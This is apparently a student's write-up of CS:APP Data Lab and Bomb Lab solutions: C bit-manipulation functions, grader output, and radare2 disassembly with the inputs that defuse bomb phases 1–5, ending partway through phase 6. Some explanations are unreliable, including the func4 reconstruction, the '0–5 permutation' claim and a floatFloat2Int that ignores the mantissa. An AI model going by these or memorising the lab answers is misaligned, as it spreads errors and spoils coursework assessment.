CSAPP Labs

Lab1 Data-lab

bitXor

用 ~ 和 & 进行异或运算，简单离散数学

/* 
 * bitXor - x^y using only ~ and & 
 *   Example: bitXor(4, 5) = 1
 *   Legal ops: ~ &
 *   Max ops: 14
 *   Rating: 1
 */
int bitXor(int x, int y) {
  return ~(~(~x & y) & ~(x & ~y));
}

tmin

要求返回补码中最小的整数

众所周知补码形式下最小数为0x80000000，由于使用的常数不能超过 0xff，所以需要使用左移运算生成

/* 
 * tmin - return minimum two's complement integer 
 *   Legal ops: ! ~ & ^ | + << >>
 *   Max ops: 4
 *   Rating: 1
 */
int tmin(void) {
  return (1 << 31);
}

isTmax

判断 x 是否为补码格式下的最大数字

满足 (~x) ^ (x + 1) 为 0 的只有 0x7fffffff 和 0xffffffff

所以需要再用 !!(~x) 排除一下 0xffffffff

/*
 * isTmax - returns 1 if x is the maximum, two's complement number,
 *     and 0 otherwise 
 *   Legal ops: ! ~ & ^ | +
 *   Max ops: 10
 *   Rating: 1
 */
int isTmax(int x) {
  return !((~x) ^ (x + 1)) & !!(~x);
}

allOddBits

其实就是返回 x & 0xaaaaaaaa == 0xaaaaaaaa

但由于常数不能超过 0xff，所以可以用右移运算来进行

/* 
 * allOddBits - return 1 if all odd-numbered bits in word set to 1
 *   where bits are numbered from 0 (least significant) to 31 (most significant)
 *   Examples allOddBits(0xFFFFFFFD) = 0, allOddBits(0xAAAAAAAA) = 1
 *   Legal ops: ! ~ & ^ | + << >>
 *   Max ops: 12
 *   Rating: 2
 */
int allOddBits(int x) {
  x &= x >> 16;
  x &= x >> 8;
  return !((x & 0xAA) ^ 0xAA);
}

negate

使用位运算和加法表示 -x

/* 
 * negate - return -x 
 *   Example: negate(1) = -1.
 *   Legal ops: ! ~ & ^ | + << >>
 *   Max ops: 5
 *   Rating: 2
 */
int negate(int x) {
  return ~x + 1;
}

isAsciiDigit

0x30 - 0x39 之间的数字返回 1

根据共同点，先忽略个位，验证是否满足 0x0000003?

随后只提取最后一位 x，判断 x + 6 后是否超过 0x10

/* 
 * isAsciiDigit - return 1 if 0x30 <= x <= 0x39 (ASCII codes for characters '0' to '9')
 *   Example: isAsciiDigit(0x35) = 1.
 *            isAsciiDigit(0x3a) = 0.
 *            isAsciiDigit(0x05) = 0.
 *   Legal ops: ! ~ & ^ | + << >>
 *   Max ops: 15
 *   Rating: 3
 */
int isAsciiDigit(int x) {
  return (!((x >> 4) ^ 0x3)) & !(((x & 0xf) + 6) >> 4);
}

conditional

要实现一个三目运算

先将 x 转换为 0 或 0xffffffff

然后再使用位运算进行输出

int conditional(int x, int y, int z) {
  x = ~!x + 1; // if x != 0 -> x = 0
               // if x == 0 -> x = 0xffffffff
  return (~x & y) | (x & z);
}

isLessOrEqual

判断 x 是否小于等于 y

判断相减后是否大于 0 即可，用位运算代替减法

/* 
 * isLessOrEqual - if x <= y  then return 1, else return 0 
 *   Example: isLessOrEqual(4,5) = 1.
 *   Legal ops: ! ~ & ^ | + << >>
 *   Max ops: 24
 *   Rating: 3
 */
int isLessOrEqual(int x, int y) {
  y += ~x + 1;
  return !(y >> 31);
}

logicalNeg

利用位运算实现 !

在int型的右移运算中，正数会在开头补 0，而负数则会在开头补 1

/* 
 * logicalNeg - implement the ! operator, using all of 
 *              the legal operators except !
 *   Examples: logicalNeg(3) = 0, logicalNeg(0) = 1
 *   Legal ops: ~ & ^ | + << >>
 *   Max ops: 12
 *   Rating: 4 
 */
int logicalNeg(int x) {
  // In right shift, negative number will fixed with 1 at MSB.
  return (((~x + 1) | x) >> 31) + 1;
}

howManyBits

计算多少位可以表示一个数

还是利用右移运算进行二分

由于需要预留符号位，最后需要 +1

/* howManyBits - return the minimum number of bits required to represent x in
 *             two's complement
 *  Examples: howManyBits(12) = 5
 *            howManyBits(298) = 10
 *            howManyBits(-5) = 4
 *            howManyBits(0)  = 1
 *            howManyBits(-1) = 1
 *            howManyBits(0x80000000) = 32
 *  Legal ops: ! ~ & ^ | + << >>
 *  Max ops: 90
 *  Rating: 4
 */
int howManyBits(int x) {
  int sign, b = 0, cur;
  sign = x >> 31;
  sign = ~!sign + 1;
  x = (~x & ~sign) | (x & sign);
  cur = !!(x >> 16) << 4;
  x >>= cur;
  b += cur;
  cur = !!(x >> 8) << 3;
  x >>= cur;
  b += cur;
  cur = !!(x >> 4) << 2;
  x >>= cur;
  b += cur;
  cur = !!(x >> 2) << 1;
  x >>= cur;
  b += cur;
  cur = !!(x >> 1);
  x >>= cur;
  b += cur + x;
  return b + 1;
}

floatScale2

后面几个是浮点数相关操作

计算 f*2

/* 
 * floatScale2 - Return bit-level equivalent of expression 2*f for
 *   floating point argument f.
 *   Both the argument and result are passed as unsigned int's, but
 *   they are to be interpreted as the bit-level representation of
 *   single-precision floating point values.
 *   When argument is NaN, return argument
 *   Legal ops: Any integer/unsigned operations incl. ||, &&. also if, while
 *   Max ops: 30
 *   Rating: 4
 */
unsigned floatScale2(unsigned uf) {
  int sign = uf >> 31 << 31;
  if ((uf << 1) == 0) return uf;
  if (((uf >> 23) & 0xff) == 0xff) return uf;
  if (((uf >> 23) & 0xff) != 0) return uf + (1 << 23);
  return (uf - sign) * 2 + sign;
}

floatFloat2Int

保留 f 的整数部分

/* 
 * floatFloat2Int - Return bit-level equivalent of expression (int) f
 *   for floating point argument f.
 *   Argument is passed as unsigned int, but
 *   it is to be interpreted as the bit-level representation of a
 *   single-precision floating point value.
 *   Anything out of range (including NaN and infinity) should return
 *   0x80000000u.
 *   Legal ops: Any integer/unsigned operations incl. ||, &&. also if, while
 *   Max ops: 30
 *   Rating: 4
 */
int floatFloat2Int(unsigned uf) {
  int e = ((uf >> 23) & 0xff) - 127, sign = uf >> 31 << 31, pow = 1;
  if (e > 31) return 0x80000000;
  if (e < 0) return 0;
  pow = 1 << e;
  if (sign) pow = ~pow + 1;
  return pow;
}

floatPower2

计算 $2.0^x$

/* 
 * floatPower2 - Return bit-level equivalent of the expression 2.0^x
 *   (2.0 raised to the power x) for any 32-bit integer x.
 *
 *   The unsigned value that is returned should have the identical bit
 *   representation as the single-precision floating-point number 2.0^x.
 *   If the result is too small to be represented as a denorm, return
 *   0. If too large, return +INF.
 * 
 *   Legal ops: Any integer/unsigned operations incl. ||, &&. Also if, while 
 *   Max ops: 30 
 *   Rating: 4
 */
unsigned floatPower2(int x) {
    if (x > 0x7f) return 0xff << 23;
    if (x < -0x7e) return 0; 
    return (x + 127) << 23;
}

result

先使用 ./dlc 验证使用的操作是否满足要求

$ ./dlc -e bits.c
dlc:bits.c:147:bitXor: 8 operators
dlc:bits.c:156:tmin: 1 operators
dlc:bits.c:167:isTmax: 8 operators
dlc:bits.c:180:allOddBits: 7 operators
dlc:bits.c:190:negate: 2 operators
dlc:bits.c:203:isAsciiDigit: 8 operators
dlc:bits.c:215:conditional: 7 operators
dlc:bits.c:226:isLessOrEqual: 5 operators
dlc:bits.c:239:logicalNeg: 5 operators
dlc:bits.c:273:howManyBits: 40 operators
dlc:bits.c:292:floatScale2: 15 operators
dlc:bits.c:312:floatFloat2Int: 10 operators
dlc:bits.c:330:floatPower2: 6 operators

随后编译并执行 ./btest

$ make clean
$ make btest
$ ./btest
Score   Rating  Errors  Function
 1      1       0       bitXor
 1      1       0       tmin
 1      1       0       isTmax
 2      2       0       allOddBits
 2      2       0       negate
 3      3       0       isAsciiDigit
 3      3       0       conditional
 3      3       0       isLessOrEqual
 4      4       0       logicalNeg
 4      4       0       howManyBits
 4      4       0       floatScale2
 4      4       0       floatFloat2Int
 4      4       0       floatPower2
Total points: 36/36

Lab2 Bomb-lab

Solve with radare2

Phase 1

[0x00400da0]> s sym.phase_1
[0x00400ee0]> pdf
            ; CALL XREF from dbg.main @ 0x400e3a(x)
┌ 28: sym.phase_1 (int64_t arg1);
│           ; arg int64_t arg1 @ rdi
│           0x00400ee0      4883ec08       sub rsp, 8
│           0x00400ee4      be00244000     mov esi, str.Border_relations_with_Canada_have_never_been_better. ; 0x402400 ; "Border relations with Canada have never been better." ; int64_t arg2
│           0x00400ee9      e84a040000     call sym.strings_not_equal
│           0x00400eee      85c0           test eax, eax
│       ┌─< 0x00400ef0      7405           je 0x400ef7
│       │   0x00400ef2      e843050000     call sym.explode_bomb
│       │   ; CODE XREF from sym.phase_1 @ 0x400ef0(x)
│       └─> 0x00400ef7      4883c408       add rsp, 8
└           0x00400efb      c3             ret

A simple strcmp

Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?

Phase 2

[0x00400da0]> s sym.phase_2
[0x00400efc]> pdf
            ; CALL XREF from dbg.main @ 0x400e56(x)
┌ 69: sym.phase_2 (const char *s);
│           ; arg const char *s @ rdi
│           ; var int64_t var_4h @ rsp+0x4
│           ; var int64_t var_18h @ rsp+0x18
│           0x00400efc      55             push rbp
│           0x00400efd      53             push rbx
│           0x00400efe      4883ec28       sub rsp, 0x28
│           0x00400f02      4889e6         mov rsi, rsp                ; int64_t arg2
│           0x00400f05      e852050000     call sym.read_six_numbers
│           0x00400f0a      833c2401       cmp dword [rsp], 1
│       ┌─< 0x00400f0e      7420           je 0x400f30
│       │   0x00400f10      e825050000     call sym.explode_bomb
..
│      ││   ; CODE XREFS from sym.phase_2 @ 0x400f2c(x), 0x400f3a(x)
│    ┌┌───> 0x00400f17      8b43fc         mov eax, dword [rbx - 4]
│    ╎╎││   0x00400f1a      01c0           add eax, eax
│    ╎╎││   0x00400f1c      3903           cmp dword [rbx], eax
│   ┌─────< 0x00400f1e      7405           je 0x400f25
│   │╎╎││   0x00400f20      e815050000     call sym.explode_bomb
│   │╎╎││   ; CODE XREF from sym.phase_2 @ 0x400f1e(x)
│   └─────> 0x00400f25      4883c304       add rbx, 4
│    ╎╎││   0x00400f29      4839eb         cmp rbx, rbp
│    └────< 0x00400f2c      75e9           jne 0x400f17
│    ┌────< 0x00400f2e      eb0c           jmp 0x400f3c
│    │╎││   ; CODE XREF from sym.phase_2 @ 0x400f0e(x)
│    │╎││   ; CODE XREF from sym.phase_2 @ +0x19(x)
│    │╎└└─> 0x00400f30      488d5c2404     lea rbx, [var_4h]
│    │╎     0x00400f35      488d6c2418     lea rbp, [var_18h]
│    │└───< 0x00400f3a      ebdb           jmp 0x400f17
│    │      ; CODE XREF from sym.phase_2 @ 0x400f2e(x)
│    └────> 0x00400f3c      4883c428       add rsp, 0x28
│           0x00400f40      5b             pop rbx
│           0x00400f41      5d             pop rbp
└           0x00400f42      c3             ret

read_six_numbers() read from input string char *s with format %d %d %d %d %d %d, and saved numbers in an array on stack.

The first cmp compare the first number with const int 1. After that, the program fall into a loop, which compare array[cur] with array[cur - 1] * 2.

Therefore, our input should be:

Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2.  Keep going!

Phase 3

[0x00400da0]> s sym.phase_3
[0x00400f43]> pdf
            ; CALL XREF from dbg.main @ 0x400e72(x)
┌ 132: sym.phase_3 (const char *s);
│           ; arg const char *s @ rdi
│           ; var uint32_t var_8h @ rsp+0x8
│           ; var uint32_t var_ch @ rsp+0xc
│           0x00400f43      4883ec18       sub rsp, 0x18
│           0x00400f47      488d4c240c     lea rcx, [var_ch]
│           0x00400f4c      488d542408     lea rdx, [var_8h]           ;   ...
│           0x00400f51      becf254000     mov esi, 0x4025cf           ; "%d %d" ; const char *format
│           0x00400f56      b800000000     mov eax, 0
│           0x00400f5b      e890fcffff     call sym.imp.__isoc99_sscanf ; int sscanf(const char *s, const char *format,   ...)
│           0x00400f60      83f801         cmp eax, 1                  ; 1
│       ┌─< 0x00400f63      7f05           jg 0x400f6a
│       │   0x00400f65      e8d0040000     call sym.explode_bomb
│       │   ; CODE XREF from sym.phase_3 @ 0x400f63(x)
│       └─> 0x00400f6a      837c240807     cmp dword [var_8h], 7
│       ┌─< 0x00400f6f      773c           ja case.default.0x400f75
│       │   0x00400f71      8b442408       mov eax, dword [var_8h]
│       │   ;-- switch
│       │   0x00400f75      ff24c5702440.  jmp qword [rax*8 + 0x402470] ; "|\x0f@" ; switch table (8 cases) at 0x402470
│       │   ;-- case 0:                                                ; from 0x00400f75
│       │   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│       │   0x00400f7c      b8cf000000     mov eax, 0xcf               ; 207
│      ┌──< 0x00400f81      eb3b           jmp 0x400fbe
│      ││   ;-- case 2:                                                ; from 0x00400f75
│      ││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│      ││   0x00400f83      b8c3020000     mov eax, 0x2c3              ; 707
│     ┌───< 0x00400f88      eb34           jmp 0x400fbe
│     │││   ;-- case 3:                                                ; from 0x00400f75
│     │││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│     │││   0x00400f8a      b800010000     mov eax, 0x100              ; 256
│    ┌────< 0x00400f8f      eb2d           jmp 0x400fbe
│    ││││   ;-- case 4:                                                ; from 0x00400f75
│    ││││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│    ││││   0x00400f91      b885010000     mov eax, 0x185              ; 389
│   ┌─────< 0x00400f96      eb26           jmp 0x400fbe
│   │││││   ;-- case 5:                                                ; from 0x00400f75
│   │││││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│   │││││   0x00400f98      b8ce000000     mov eax, 0xce               ; 206
│  ┌──────< 0x00400f9d      eb1f           jmp 0x400fbe
│  ││││││   ;-- case 6:                                                ; from 0x00400f75
│  ││││││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│  ││││││   0x00400f9f      b8aa020000     mov eax, 0x2aa              ; 682
│ ┌───────< 0x00400fa4      eb18           jmp 0x400fbe
│ │││││││   ;-- case 7:                                                ; from 0x00400f75
│ │││││││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│ │││││││   0x00400fa6      b847010000     mov eax, 0x147              ; 327
│ ────────< 0x00400fab      eb11           jmp 0x400fbe
│ │││││││   ;-- default:                                               ; from 0x400f75
│ │││││││   ; CODE XREFS from sym.phase_3 @ 0x400f6f(x), 0x400f75(x)
│ ││││││└─> 0x00400fad      e888040000     call sym.explode_bomb
..
│ │││││││   ;-- case 1:                                                ; from 0x00400f75
│ │││││││   ; CODE XREF from sym.phase_3 @ 0x400f75(x)
│ │││││││   0x00400fb9      b837010000     mov eax, 0x137              ; 311
│ │││││││   ; XREFS: CODE 0x00400f81  CODE 0x00400f88  CODE 0x00400f8f  CODE 0x00400f96  CODE 0x00400f9d  CODE 0x00400fa4
│ │││││││   ; XREFS: CODE 0x00400fab  CODE 0x00400fb7
│ └└└└└└└─> 0x00400fbe      3b44240c       cmp eax, dword [var_ch]
│       ┌─< 0x00400fc2      7405           je 0x400fc9
│       │   0x00400fc4      e871040000     call sym.explode_bomb
│       │   ; CODE XREF from sym.phase_3 @ 0x400fc2(x)
│       └─> 0x00400fc9      4883c418       add rsp, 0x18
└           0x00400fcd      c3             ret

First read 2 number from input (format is %d %d), and save them in [var_8h], [var_ch].

Number 1 in [var_8h] is used for a switch-case, and Number 2 in [var_ch] is used to compare with eax which set in case.

Valid input:

For example:

That's number 2.  Keep going!
7 327
Halfway there!

Phase 4

[0x00400da0]> s sym.phase_4
[0x0040100c]> pdf
            ; CALL XREF from dbg.main @ 0x400e8e(x)
┌ 86: sym.phase_4 (const char *s);
│           ; arg const char *s @ rdi
│           ; var uint32_t var_8h @ rsp+0x8
│           ; var uint32_t var_ch @ rsp+0xc
│           0x0040100c      4883ec18       sub rsp, 0x18
│           0x00401010      488d4c240c     lea rcx, [var_ch]
│           0x00401015      488d542408     lea rdx, [var_8h]           ;   ...
│           0x0040101a      becf254000     mov esi, 0x4025cf           ; "%d %d" ; const char *format
│           0x0040101f      b800000000     mov eax, 0
│           0x00401024      e8c7fbffff     call sym.imp.__isoc99_sscanf ; int sscanf(const char *s, const char *format,   ...)
│           0x00401029      83f802         cmp eax, 2                  ; 2
│       ┌─< 0x0040102c      7507           jne 0x401035
│       │   0x0040102e      837c24080e     cmp dword [var_8h], 0xe
│      ┌──< 0x00401033      7605           jbe 0x40103a
│      ││   ; CODE XREF from sym.phase_4 @ 0x40102c(x)
│      │└─> 0x00401035      e800040000     call sym.explode_bomb
│      │    ; CODE XREF from sym.phase_4 @ 0x401033(x)
│      └──> 0x0040103a      ba0e000000     mov edx, 0xe                ; 14 ; int64_t arg3
│           0x0040103f      be00000000     mov esi, 0                  ; int64_t arg2
│           0x00401044      8b7c2408       mov edi, dword [var_8h]     ; int64_t arg1
│           0x00401048      e881ffffff     call sym.func4
│           0x0040104d      85c0           test eax, eax
│       ┌─< 0x0040104f      7507           jne 0x401058
│       │   0x00401051      837c240c00     cmp dword [var_ch], 0
│      ┌──< 0x00401056      7405           je 0x40105d
│      ││   ; CODE XREF from sym.phase_4 @ 0x40104f(x)
│      │└─> 0x00401058      e8dd030000     call sym.explode_bomb
│      │    ; CODE XREF from sym.phase_4 @ 0x401056(x)
│      └──> 0x0040105d      4883c418       add rsp, 0x18
└           0x00401061      c3             ret


[0x0040100c]> s sym.func4
[0x00400fce]> pdf
            ; CALL XREFS from sym.func4 @ 0x400fe9(x), 0x400ffe(x)
            ; CALL XREF from sym.phase_4 @ 0x401048(x)
┌ 62: sym.func4 (signed int arg1, int64_t arg2, int64_t arg3);
│           ; arg signed int arg1 @ rdi
│           ; arg int64_t arg2 @ rsi
│           ; arg int64_t arg3 @ rdx
│           0x00400fce      4883ec08       sub rsp, 8
│           0x00400fd2      89d0           mov eax, edx                ; arg3
│           0x00400fd4      29f0           sub eax, esi                ; arg2
│           0x00400fd6      89c1           mov ecx, eax
│           0x00400fd8      c1e91f         shr ecx, 0x1f
│           0x00400fdb      01c8           add eax, ecx
│           0x00400fdd      d1f8           sar eax, 1
│           0x00400fdf      8d0c30         lea ecx, [rax + rsi]
│           0x00400fe2      39f9           cmp ecx, edi                ; arg1
│       ┌─< 0x00400fe4      7e0c           jle 0x400ff2
│       │   0x00400fe6      8d51ff         lea edx, [rcx - 1]
│       │   0x00400fe9      e8e0ffffff     call sym.func4
│       │   0x00400fee      01c0           add eax, eax
│      ┌──< 0x00400ff0      eb15           jmp 0x401007
│      ││   ; CODE XREF from sym.func4 @ 0x400fe4(x)
│      │└─> 0x00400ff2      b800000000     mov eax, 0
│      │    0x00400ff7      39f9           cmp ecx, edi                ; arg1
│      │┌─< 0x00400ff9      7d0c           jge 0x401007
│      ││   0x00400ffb      8d7101         lea esi, [rcx + 1]
│      ││   0x00400ffe      e8cbffffff     call sym.func4
│      ││   0x00401003      8d440001       lea eax, [rax + rax + 1]
│      ││   ; CODE XREFS from sym.func4 @ 0x400ff0(x), 0x400ff9(x)
│      └└─> 0x00401007      4883c408       add rsp, 8
└           0x0040100b      c3             ret

Still, read 2 numbers from input by sscanf().

The func4() should be:

int func4(int a1, long long a2, long long a3){
    int ecx = a3 - a2;
    ecx += ecx >> 0x1f;
    ecx = (ecx >> 1) + a2;
    if (ecx > a1) return func4(a1, a2, a3 - 1) * 2;
    if (ecx < a1) return func4(a1, a2, a3 + 1) * 2 + 1;
    return 0;
}

Our target is func(input[0], 0, 14) == 0, therefore input[0] should be 0 or 1.

Since cmp dword [var_ch], 0, input[1] should be 0.

Halfway there!
1 0
So you got that one.  Try this one.

Phase 5

[0x00400da0]> s sym.phase_5
[0x00401062]> pdf
            ; CALL XREF from dbg.main @ 0x400eaa(x)
┌ 137: sym.phase_5 (int64_t arg1);
│           ; arg int64_t arg1 @ rdi
│           ; var int64_t var_10h @ rsp+0x10
│           ; var int64_t var_16h @ rsp+0x16
│           ; var int64_t canary @ rsp+0x18
│           0x00401062      53             push rbx
│           0x00401063      4883ec20       sub rsp, 0x20
│           0x00401067      4889fb         mov rbx, rdi                ; arg1
│           0x0040106a      64488b042528.  mov rax, qword fs:[0x28]
│           0x00401073      4889442418     mov qword [canary], rax
│           0x00401078      31c0           xor eax, eax
│           0x0040107a      e89c020000     call sym.string_length
│           0x0040107f      83f806         cmp eax, 6                  ; 6
│       ┌─< 0x00401082      744e           je 0x4010d2
│       │   0x00401084      e8b1030000     call sym.explode_bomb
..
│      ││   ; CODE XREFS from sym.phase_5 @ 0x4010ac(x), 0x4010d7(x)
│    ┌┌───> 0x0040108b      0fb60c03       movzx ecx, byte [rbx + rax]
│    ╎╎││   0x0040108f      880c24         mov byte [rsp], cl
│    ╎╎││   0x00401092      488b1424       mov rdx, qword [rsp]
│    ╎╎││   0x00401096      83e20f         and edx, 0xf                ; 15
│    ╎╎││   0x00401099      0fb692b02440.  movzx edx, byte [rdx + obj.array.3449] ; [0x4024b0:1]=109 ; "maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?"
│    ╎╎││   0x004010a0      88540410       mov byte [rsp + rax + 0x10], dl
│    ╎╎││   0x004010a4      4883c001       add rax, 1
│    ╎╎││   0x004010a8      4883f806       cmp rax, 6                  ; 6
│    └────< 0x004010ac      75dd           jne 0x40108b
│     ╎││   0x004010ae      c644241600     mov byte [var_16h], 0
│     ╎││   0x004010b3      be5e244000     mov esi, str.flyers         ; 0x40245e ; "flyers" ; int64_t arg2
│     ╎││   0x004010b8      488d7c2410     lea rdi, [var_10h]          ; int64_t arg1
│     ╎││   0x004010bd      e876020000     call sym.strings_not_equal
│     ╎││   0x004010c2      85c0           test eax, eax
│    ┌────< 0x004010c4      7413           je 0x4010d9
│    │╎││   0x004010c6      e86f030000     call sym.explode_bomb
..
│   ││╎││   ; CODE XREF from sym.phase_5 @ 0x401082(x)
│   ││╎││   ; CODE XREF from sym.phase_5 @ +0x27(x)
│   ││╎└└─> 0x004010d2      b800000000     mov eax, 0
│   ││└───< 0x004010d7      ebb2           jmp 0x40108b
│   ││      ; CODE XREF from sym.phase_5 @ 0x4010c4(x)
│   ││      ; CODE XREF from sym.phase_5 @ +0x6e(x)
│   └└────> 0x004010d9      488b442418     mov rax, qword [canary]
│           0x004010de      644833042528.  xor rax, qword fs:[0x28]
│       ┌─< 0x004010e7      7405           je 0x4010ee
│       │   0x004010e9      e842faffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
│       │   ; CODE XREF from sym.phase_5 @ 0x4010e7(x)
│       └─> 0x004010ee      4883c420       add rsp, 0x20
│           0x004010f2      5b             pop rbx
└           0x004010f3      c3             ret

First, string_length(input) == 6.

Fall into a loop:

for (int i = 0; i != 6; i++){
    ecx = input[i];
    edx = ecx & 0xf;
    edx = maduiersnfotvbyl[edx];
    var_10h[i] = edx;
}
strings_not_equal(var_10h[i], "flyers");

So our input should be:

0x?9 0x?f 0x?e 0x?5 0x?6 0x?7

For easy to input, we can simply set ? as 6.

So you got that one.  Try this one.
ionefg
Good work!  On to the next...

Phase 6

[0x00400da0]> s sym.phase_6
[0x004010f4]> pdf
            ; CALL XREF from dbg.main @ 0x400ec6(x)
┌ 272: sym.phase_6 (const char *s);
│           ; arg const char *s @ rdi
│           ; var int64_t var_18h @ rsp+0x18
│           ; var int64_t var_20h @ rsp+0x20
│           ; var int64_t var_28h @ rsp+0x28
│           ; var int64_t var_50h @ rsp+0x50
│           0x004010f4      4156           push r14
│           0x004010f6      4155           push r13
│           0x004010f8      4154           push r12
│           0x004010fa      55             push rbp
│           0x004010fb      53             push rbx
│           0x004010fc      4883ec50       sub rsp, 0x50
│           0x00401100      4989e5         mov r13, rsp
│           0x00401103      4889e6         mov rsi, rsp                ; int64_t arg2
│           0x00401106      e851030000     call sym.read_six_numbers
│           0x0040110b      4989e6         mov r14, rsp
│           0x0040110e      41bc00000000   mov r12d, 0
│           ; CODE XREF from sym.phase_6 @ 0x401151(x)
│       ┌─> 0x00401114      4c89ed         mov rbp, r13
│       ╎   0x00401117      418b4500       mov eax, dword [r13]
│       ╎   0x0040111b      83e801         sub eax, 1
│       ╎   0x0040111e      83f805         cmp eax, 5                  ; 5
│      ┌──< 0x00401121      7605           jbe 0x401128
│      │╎   0x00401123      e812030000     call sym.explode_bomb
│      │╎   ; CODE XREF from sym.phase_6 @ 0x401121(x)
│      └──> 0x00401128      4183c401       add r12d, 1
│       ╎   0x0040112c      4183fc06       cmp r12d, 6                 ; 6
│      ┌──< 0x00401130      7421           je 0x401153
│      │╎   0x00401132      4489e3         mov ebx, r12d
│      │╎   ; CODE XREF from sym.phase_6 @ 0x40114b(x)
│     ┌───> 0x00401135      4863c3         movsxd rax, ebx
│     ╎│╎   0x00401138      8b0484         mov eax, dword [rsp + rax*4]
│     ╎│╎   0x0040113b      394500         cmp dword [rbp], eax
│    ┌────< 0x0040113e      7505           jne 0x401145
│    │╎│╎   0x00401140      e8f5020000     call sym.explode_bomb
│    │╎│╎   ; CODE XREF from sym.phase_6 @ 0x40113e(x)
│    └────> 0x00401145      83c301         add ebx, 1
│     ╎│╎   0x00401148      83fb05         cmp ebx, 5                  ; 5
│     └───< 0x0040114b      7ee8           jle 0x401135
│      │╎   0x0040114d      4983c504       add r13, 4
│      │└─< 0x00401151      ebc1           jmp 0x401114
│      │    ; CODE XREF from sym.phase_6 @ 0x401130(x)
│      └──> 0x00401153      488d742418     lea rsi, [var_18h]
│           0x00401158      4c89f0         mov rax, r14
│           0x0040115b      b907000000     mov ecx, 7
│           ; CODE XREF from sym.phase_6 @ 0x40116d(x)
│       ┌─> 0x00401160      89ca           mov edx, ecx
│       ╎   0x00401162      2b10           sub edx, dword [rax]
│       ╎   0x00401164      8910           mov dword [rax], edx
│       ╎   0x00401166      4883c004       add rax, 4
│       ╎   0x0040116a      4839f0         cmp rax, rsi
│       └─< 0x0040116d      75f1           jne 0x401160
│           0x0040116f      be00000000     mov esi, 0
│       ┌─< 0x00401174      eb21           jmp 0x401197
│       │   ; CODE XREFS from sym.phase_6 @ 0x40117f(x), 0x4011a9(x)
│     ┌┌──> 0x00401176      488b5208       mov rdx, qword [rdx + 8]
│     ╎╎│   0x0040117a      83c001         add eax, 1
│     ╎╎│   0x0040117d      39c8           cmp eax, ecx
│     └───< 0x0040117f      75f5           jne 0x401176
│     ┌───< 0x00401181      eb05           jmp 0x401188
│     │╎│   ; CODE XREF from sym.phase_6 @ 0x40119d(x)
│    ┌────> 0x00401183      bad0326000     mov edx, obj.node1          ; 0x6032d0 ; "L\x01"
│    ╎│╎│   ; CODE XREF from sym.phase_6 @ 0x401181(x)
│    ╎└───> 0x00401188      4889547420     mov qword [rsp + rsi*2 + 0x20], rdx
│    ╎ ╎│   0x0040118d      4883c604       add rsi, 4
│    ╎ ╎│   0x00401191      4883fe18       cmp rsi, 0x18               ; 24
│    ╎┌───< 0x00401195      7414           je 0x4011ab
│    ╎│╎│   ; CODE XREF from sym.phase_6 @ 0x401174(x)
│    ╎│╎└─> 0x00401197      8b0c34         mov ecx, dword [rsp + rsi]
│    ╎│╎    0x0040119a      83f901         cmp ecx, 1                  ; 1
│    └────< 0x0040119d      7ee4           jle 0x401183
│     │╎    0x0040119f      b801000000     mov eax, 1
│     │╎    0x004011a4      bad0326000     mov edx, obj.node1          ; 0x6032d0 ; "L\x01"
│     │└──< 0x004011a9      ebcb           jmp 0x401176
│     │     ; CODE XREF from sym.phase_6 @ 0x401195(x)
│     └───> 0x004011ab      488b5c2420     mov rbx, qword [var_20h]
│           0x004011b0      488d442428     lea rax, [var_28h]
│           0x004011b5      488d742450     lea rsi, [var_50h]
│           0x004011ba      4889d9         mov rcx, rbx
│           ; CODE XREF from sym.phase_6 @ 0x4011d0(x)
│       ┌─> 0x004011bd      488b10         mov rdx, qword [rax]
│       ╎   0x004011c0      48895108       mov qword [rcx + 8], rdx
│       ╎   0x004011c4      4883c008       add rax, 8
│       ╎   0x004011c8      4839f0         cmp rax, rsi
│      ┌──< 0x004011cb      7405           je 0x4011d2
│      │╎   0x004011cd      4889d1         mov rcx, rdx
│      │└─< 0x004011d0      ebeb           jmp 0x4011bd
│      │    ; CODE XREF from sym.phase_6 @ 0x4011cb(x)
│      └──> 0x004011d2      48c742080000.  mov qword [rdx + 8], 0
│           0x004011da      bd05000000     mov ebp, 5
│           ; CODE XREF from sym.phase_6 @ 0x4011f5(x)
│       ┌─> 0x004011df      488b4308       mov rax, qword [rbx + 8]
│       ╎   0x004011e3      8b00           mov eax, dword [rax]
│       ╎   0x004011e5      3903           cmp dword [rbx], eax
│      ┌──< 0x004011e7      7d05           jge 0x4011ee
│      │╎   0x004011e9      e84c020000     call sym.explode_bomb
│      │╎   ; CODE XREF from sym.phase_6 @ 0x4011e7(x)
│      └──> 0x004011ee      488b5b08       mov rbx, qword [rbx + 8]
│       ╎   0x004011f2      83ed01         sub ebp, 1
│       └─< 0x004011f5      75e8           jne 0x4011df
│           0x004011f7      4883c450       add rsp, 0x50
│           0x004011fb      5b             pop rbx
│           0x004011fc      5d             pop rbp
│           0x004011fd      415c           pop r12
│           0x004011ff      415d           pop r13
│           0x00401201      415e           pop r14
└           0x00401203      c3             ret

read_six_numbers() from input string.

A loop:

for (int r12d = 0; r12d != 6; r12d++) {
    if (*r13 - 1 > 5) explode_bomb();
    for (int ebx = r12d; ebx <= 5; ebx++) {
        if (*r13 == rsp[ebx]) explode_bomb();
    }
    r13 += 1;
}

Therefore, 6 numbers must be a permutation of [0, 1, 2, 3, 4, 5].

Calculations before check.

num[i] = 7 - num[i]:

rax = rsp;
do {
    *rax = 7 - *rax;
    rax += 4;
} while(rax != rsp + 0x18);

Re-sort the Nodes.

for (int esi = 0; esi < 0x18; esi += 4) {
    ecx = rsp[esi];
    if (ecx <= 1) {
        edx = node1;
    }
    else {
        eax = 1;
        edx = node1;
        do {
            rdx = rdx.next;
            eax += 1;
        } while (eax != ecx);
    }
    var_20h[rsi * 2] = rdx;
}

Node is a One-way LinkedList

node1
    dd 14Ch 
    dd 1
    dq offset node2

node2
    dd 0A8h
    dd 2
    dq offset node3

node3
    dd 39Ch
    dd 3
    dq offset node4

